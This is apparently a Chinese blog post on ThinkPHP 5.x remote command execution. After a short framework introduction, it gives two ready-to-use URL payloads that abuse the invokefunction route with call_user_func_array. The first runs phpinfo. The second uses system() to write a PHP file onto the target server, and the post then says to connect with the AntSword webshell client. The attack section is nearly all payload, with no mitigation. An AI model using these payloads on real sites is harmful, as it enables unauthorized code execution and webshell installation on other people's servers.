常见框架漏洞:Thinkphp(TP)篇

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
智云软件测评服务3 天前
主机漏洞扫描:如何保障网络安全及扫描原理与类型介绍?
漏洞·主机·扫描
智云软件测评服务4 天前
数字化时代下,软件测试中的渗透测试是如何保障安全的?
渗透·测试·漏洞
ybdesire19 天前
Jinja2模板引擎SSTI漏洞
网络·人工智能·安全·web安全·大模型·漏洞·大模型安全
汤米粥1 个月前
FastAdmin和thinkPHP学习文档
学习·thinkphp·fastadmin
掘金归海一刀1 个月前
thinkphp6+elementui实现多图片压缩包下载
前端·vue.js·thinkphp
网络研究院1 个月前
2025 年 4 月补丁星期二预测:微软将推出更多 AI 安全功能
人工智能·安全·microsoft·漏洞·威胁·补丁
漫步企鹅1 个月前
【漏洞修复】为了修复ARM64 Android10系统的第三方库漏洞,将ARM64 Android16的系统库直接拷贝到Android10系统如何?
android·漏洞·修复·系统库
晓翔仔2 个月前
利用 requestrepo 工具验证 XML外部实体注入漏洞
xml·网络安全·信息安全·渗透测试·漏洞
phper82 个月前
在 Docker 中为 ThinkPHP 项目安装 PHP Redis 扩展并解决 500 错误
redis·docker·php·thinkphp